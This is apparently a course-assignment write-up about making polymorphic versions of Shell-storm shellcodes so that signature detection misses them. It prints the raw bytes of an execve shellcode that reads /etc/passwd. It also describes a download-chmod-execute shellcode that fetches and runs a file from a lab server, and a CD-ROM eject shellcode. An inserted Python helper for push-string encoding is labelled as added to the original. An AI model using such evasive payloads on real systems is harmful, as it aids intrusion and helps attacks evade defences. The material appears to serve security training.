- Take up 3 shellcodes from Shell-storm and create polymorphic versions of them to beat pattern matching
- The polymorphic versions cannot be larger than 150% of the existing shellcode
- Bonus points for making it shorter in length than original
Basic principles:
- Replace instructions with ones of equivalent functionality (so that the behaviour is preserved)
- Add garbage instructions that don't change the functionality in any way (NOP equivalents)
Source:
http://shell-storm.org/shellcode/files/shellcode-571.php
(43 Bytes)
It took some work to turn this back into a nasm file, as the comments are somewhat mixed up (AT&T vs. Intel syntax, extra spaces).
Some remodeling fixed it:
Just checking whether my interpretation of this was right. I'll do that by dumping the shellcode with the objdump command:
nelis@slae:~/SLAE/assignment6$ objdump -d ./shell571|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"
A quick scan reveals no differences between the shellcode I generated and the shellcode in the original download.
Now we make some alterations to the original code to prevent pattern detection. Here you see the changes in relation to the original instructions: Ultimately this leads to a new file, which I'll call headpass.nasm:
The size of this shellcode is 61 bytes, which just fits within the maximum allowed (43*150% = 64 bytes).
Since I was confident this instruction set was different enough from its source, I figured I would try and submit it to exploit-db. Those extra points could come in handy, right:
Tadaa! There it is. Published on exploit-db:
https://www.exploit-db.com/shellcodes/45940
(B) Download, chmod and execute:
http://shell-storm.org/shellcode/files/shellcode-862.php
At the very least the IP address needs to change. I have set up a server with IP address 192.168.1.48 running an HTTP server that offers a file:
192.168.1.48/x
>>> "192.168.1.48///x"[::-1].encode('hex')
782f2f2f 38342e31 2e383631 2e323931
content of x:
#!/bin/bash
echo This is a test
Seems to be working just fine at the moment
nelis@slae:~/SLAE/assignment6$ ls -al x
-rwxrwxrwx 1 nelis nelis 36 Dec 1 19:44 x
There it is, with the modified permissions!
So we confirmed it's working. Time for a breakdown of the assembly code:
The lines with changed instructions have been marked with ***
Note that this shellcode has a fork/child construction. In order to debug the child process with GDB, I had to find out how to set up GDB accordingly. I learned that by using "set follow-fork-mode child" I was able to debug the newly created child process.
This final polymorphic code is 101 bytes in size. The original version was 108 bytes, so in addition to defeating pattern detection, the size has also decreased by 7 bytes.
(C) Eject CDROM drive
Shellcode for ejecting the CD-ROM drive (after confirming my PC still has one):
http://shell-storm.org/shellcode/files/shellcode-621.php
Original shellcode (46 bytes):
"\x6a\x0b\x58\x99\x52"
"\x6a\x6d\x68\x63\x64"
"\x72\x6f\x89\xe1\x52"
"\x66\x68\x63\x74\x68"
"\x2f\x65\x6a\x65\x68"
"\x2f\x62\x69\x6e\x68"
"\x2f\x75\x73\x72\x89"
"\xe3\x52\x51\x53\x89"
"\xe1\xcd\x80\x40\xcd"
"\x80"
Let's try and reverse this to assembly instructions:
So, before actually running this untrusted shellcode we first perform some debugging:
We include the shellcode in a C-file and debug that.
So we now have the assembly instructions ready for debugging, and in the process we validated that no harm will be done by executing this shellcode. Now we make some modifications to the original code and put it in our template file:
The lines with changed instructions have been marked with *** and the changes are commented.
Again we used python to do the hex encoding and reversing:
nelis@slae:~$ python
Python 2.7.3 (default, Feb 27 2014, 19:39:10)
[GCC 4.7.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> "//usr/bin//eject"[::-1].encode('hex')
'7463656a652f2f6e69622f7273752f2f'
>>>
7463656a 652f2f6e 69622f72 73752f2f
push 0x7463656a ;tcej
push 0x652f2f6e ;e/ni
push 0x69622f72 ;b/re
push 0x73752f2f ;su//
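The string-to-push conversion done above by hand with Python 2's .encode('hex'), as an added example (not from the original post) in Python 3, together with the reverse direction used when reading pushes back into a string while analysing an unknown shellcode. The padding helper is an assumption of this example: it doubles '/' before the last path component, the way the post padded its own strings.

```python
# Added example, not the post's own code: little-endian dword packing of a string
# for a push sequence, and the inverse that an analyst uses to recover the string.

def pad_path(path: str) -> str:
    """Pad a path to a multiple of 4 bytes by repeating '/' before the last
    component, as the post does with '192.168.1.48///x' and '//usr/bin//eject'.
    Extra slashes do not change how the path resolves."""
    missing = (-len(path.encode())) % 4
    if missing == 0:
        return path
    head, sep, tail = path.rpartition("/")
    return head + sep + "/" * missing + tail


def string_to_push_immediates(s: str) -> list:
    """Return the dword immediates in push order: the last 4 bytes of the
    string are pushed first so the string ends up in memory in reading order."""
    data = s.encode()
    if len(data) % 4:
        raise ValueError("length must be a multiple of 4; use pad_path() first")
    chunks = [data[i:i + 4] for i in range(0, len(data), 4)]
    return [int.from_bytes(c, "little") for c in reversed(chunks)]


def nasm_push_lines(s: str) -> list:
    """Render the immediates as NASM lines with the post's reversed-chunk comments."""
    return [f"push 0x{imm:08x} ;{imm.to_bytes(4, 'little')[::-1].decode()}"
            for imm in string_to_push_immediates(s)]


def pushes_to_string(immediates: list) -> str:
    """Analyst direction: given the push immediates in program order (as read
    from objdump), rebuild the string the sequence writes onto the stack."""
    parts = [imm.to_bytes(4, "little") for imm in immediates]
    return b"".join(reversed(parts)).decode()


if __name__ == "__main__":
    for line in nasm_push_lines(pad_path("/usr/bin/eject")):
        print(line)
    print(pushes_to_string([0x7463656a, 0x652f2f6e, 0x69622f72, 0x73752f2f]))
```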
We assemble, link, compile (compile.sh) and run, and magically the CD-ROM drive opens using a shellcode that is completely different and has decreased in size from 46 to 37 bytes!